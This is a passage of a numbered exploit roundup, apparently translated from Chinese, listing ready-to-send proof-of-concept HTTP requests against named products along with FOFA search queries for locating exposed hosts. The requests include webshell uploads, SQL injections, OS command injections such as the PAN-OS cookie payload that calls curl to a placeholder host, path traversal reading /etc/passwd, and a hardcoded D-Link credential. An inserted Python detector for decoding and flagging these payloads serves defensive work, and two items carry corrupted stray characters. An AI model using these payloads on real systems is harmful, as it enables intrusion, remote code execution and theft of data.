133. H5 cloud mall (云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat /api/cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

5 [0 T$ Q& Y; @* M1 a! Q% }! O140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入6 Y, C) d+ _* j! f& @* u! {
CVE-2024-2566
8 g/ D1 W( R- k9 y! s5 v6 gFOFA:body="app/structure/departments.php" || app="指挥调度管理平台", q* A; J' Z  K7 k8 d- D" r0 G
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1+ k  F3 s- x  D4 P) o# @$ q
Host: x.x.x.x
& m% V, u% Q) b* [# bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 q7 A# i2 Z7 W: D" g2 V5 F4 k8 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. ]6 y/ l# d7 Z; |/ j6 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ S7 t! v, c  y" n& ~Accept-Encoding: gzip, deflate, br) u4 A! g5 W- [
Connection: close+ ?) w2 ?- Q9 d2 ^
Cookie: authcode=h8g9$ ^  T* G9 z# K; z) _/ |
Upgrade-Insecure-Requests: 1  U) I& [8 m6 ?& R6 {, l
" U- ^! B" c5 |

. i2 n* u% j* v: ]# W9 U141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
( y, E; ^0 o; s1 V. z8 ~2 p0 X5 LFOFA:body="指挥调度管理平台"4 v# [8 h% t/ \  K
POST /app/ext/ajax_users.php HTTP/1.1) T1 t- O# s3 Z  Z( j
Host: your-ip
* ~' W5 r2 Y( j' D* `% i9 hUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info" \& J6 ^8 \# C* k  J4 l
Content-Type: application/x-www-form-urlencoded
8 O7 ]3 p, m3 x* V7 i; G4 n; X- f& n* b

7 B# V; I6 }- n3 [" N( udep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
  y" D  c' |7 \! W) R! S
. c0 z$ o4 P' ?4 n: U5 X) T$ B7 F; l- B% d! [& M0 c
142. CMSV6 vehicle monitoring platform default credentials
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link NAS nas_sharing.cgi command injection
CVE-2024-3273 (the hardcoded account it is reached through is CVE-2024-3272)
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= is id). user and passwd are the device's hardcoded account; passwd YWJjMTIzNDVjYmE decodes to abc12345cba.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-address>`;
Accept-Encoding: gzip

The SESSID value is used as a file path, so the traversal drops a file into the device telemetry directory; the backtick-quoted command in its name runs when telemetry processes that directory. ${IFS} stands in for the space the file name cannot contain.

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
url=cnRzcDovL2EK is rtsp://a base64-encoded; the injected command sits in transport, which URL-decodes to: || (echo '[S]'; id; echo '[E]')#;
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / server-side template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source dashboard remote command execution
FOFA:title="AJ-Report"
The validationRules field is evaluated as script on the server; the function body spawns ipconfig through java.lang.ProcessBuilder and returns its output. The ;swagger-ui/ suffix is what lets the request through without authentication.

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

As listed, the request only shows /dataSource/pageList being reached unauthenticated through the ;swagger-ui/ path trick; the roundup does not include the injection payload itself.

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is ';ls;':doesnotmatter base64-encoded: the username half of the HTTP Basic credential carries the injected command, the password is irrelevant.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

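Several of the requests in this roundup hide their payload behind an encoding layer: the Byzoro importexport.php sql parameter and the D-Link nas_sharing.cgi system parameter are base64, the LoadMaster command above rides in the username half of an HTTP Basic credential, the Kirisun injections are URL-encoded, the TeamCity bypass lives in a ;.jsp suffix and the PAN-OS payload sits in a cookie. A rule matched against the raw request line misses most of them. The following is an added example (not part of the original roundup and not any vendor's code) that decodes each field before matching a short, deliberately broad rule set; the sample requests are constructed here from the page's own payload strings with placeholder hosts, and the rule list is illustrative rather than complete.

```python
import base64
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Added example. Rules run against *decoded* text only; the decoding layers
# below are what let this short list cover URL-encoded, base64-wrapped and
# Basic-auth-wrapped payloads alike. The list is illustrative, not complete.
SIGNATURES = {
    "sql-time-based": re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(", re.I),
    "sql-error-based": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "sql-union": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
    "sql-statement": re.compile(r"^\s*(select|insert|update|delete|drop)\b", re.I),
    "shell-command": re.compile(r"^\s*(id|whoami|uname|ls|cat|curl|wget|nc|sh|bash)\b", re.I),
    "shell-metachar": re.compile(r"[;`|]|\$\{IFS\}|\$\("),
    "path-traversal": re.compile(r"(^|/)\.\.(/|$)"),
    "path-suffix-bypass": re.compile(r";\.jsp\b|;swagger-ui/", re.I),
}
COOKIE_SIGS = ["path-traversal", "shell-metachar", "sql-time-based"]
AUTH_SIGS = ["shell-metachar", "shell-command", "sql-time-based", "sql-union"]


def try_base64(value: str) -> Optional[str]:
    """Decoded text if value is well-formed base64 that decodes to printable
    text, else None. Padding is restored first because PoCs on this page
    (passwd=YWJjMTIzNDVjYmE) drop it."""
    if len(value) < 4 or not re.fullmatch(r"[A-Za-z0-9+/]+=*", value):
        return None
    padded = value + "=" * (-len(value) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8").strip()
    except ValueError:  # binascii.Error and UnicodeDecodeError both qualify
        return None
    return text if text and text.isprintable() else None


def decodings(value: str) -> List[str]:
    """Every form a rule should see: raw, URL-decoded once more (catches double
    encoding), and the base64 decoding of each of those."""
    forms = [value]
    if unquote(value) != value:
        forms.append(unquote(value))
    forms += [t for t in (try_base64(f) for f in list(forms)) if t]
    return forms


def hits(text: str, names) -> List[str]:
    return [n for n in names if SIGNATURES[n].search(text)]


def analyze_request(req: Dict) -> List[str]:
    """Sorted 'location=rule' findings for one request given as
    {"method", "target" (raw request-target), "headers"}."""
    found = set()
    parts = urlsplit(req["target"])
    found.update(f"target={s}" for s in hits(unquote(req["target"]), ["path-suffix-bypass"]))
    found.update(f"path={s}" for s in hits(unquote(parts.path), ["path-traversal"]))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for form in decodings(value):
            found.update(f"query:{name}={s}" for s in hits(form, SIGNATURES))
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        creds = try_base64(auth.split(None, 1)[1])
        if creds:  # the username half is where LoadMaster's command travels
            found.update(f"auth-user={s}" for s in hits(creds.split(":", 1)[0], AUTH_SIGS))
    for cookie in headers.get("cookie", "").split(";"):
        name, _, value = cookie.strip().partition("=")
        for form in decodings(value):
            found.update(f"cookie:{name}={s}" for s in hits(form, COOKIE_SIGS))
    return sorted(found)


# Constructed sample requests: payload strings are the ones listed on this page,
# hosts and the out-of-band address are placeholders.
SAMPLE_REQUESTS = {
    "byzoro-importexport": {"method": "GET", "target": "/importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql", "headers": {}},
    "dlink-nas-sharing": {"method": "GET", "target": "/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ=", "headers": {}},
    "loadmaster-basic-auth": {"method": "GET", "target": "/access/set?param=enableapi&value=1", "headers": {"Authorization": "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="}},
    "kirisun-down-file": {"method": "GET", "target": "/api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF", "headers": {}},
    "teamcity-jsp-suffix": {"method": "POST", "target": "/pwned?jsp=/app/rest/users;.jsp", "headers": {}},
    "panos-sessid-cookie": {"method": "GET", "target": "/global-protect/login.esp", "headers": {"Cookie": "SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/x`curl${IFS}example.invalid`;"}},
    "benign-static-asset": {"method": "GET", "target": "/static/css/app.css?v=2.1.0", "headers": {"Cookie": "PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db; lang=en-US"}},
}


def scan(requests: Dict[str, Dict]) -> Dict[str, List[str]]:
    return {name: analyze_request(req) for name, req in requests.items()}


if __name__ == "__main__":
    for name, findings in scan(SAMPLE_REQUESTS).items():
        print(f"{name:24s} {findings or '-'}")
```

The shell-metachar rule on query values is intentionally noisy (a ; in any parameter fires it); in production it would be scoped to endpoints that are known to hand a parameter to a shell, and the decoded forms, not just the rule names, should be logged so an analyst sees the actual SQL or command.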
153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into a temporary file in its cache
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

The PG_SLEEP() call identifies the backend as PostgreSQL; a response delayed by about five seconds confirms the injection.

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--


Access the echoed file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"


POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. MetaCRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--


http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT (英飞达) Medical Imaging Archiving and Communication System WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>


/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) Intelligent Parking Fee System Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field specifies the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>


http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) Multimedia Information Release System QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--


http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) Distribution Management System ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Huixiaoyuan / Anxiaoyi Smart Campus Management System (慧校园/安校易) FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
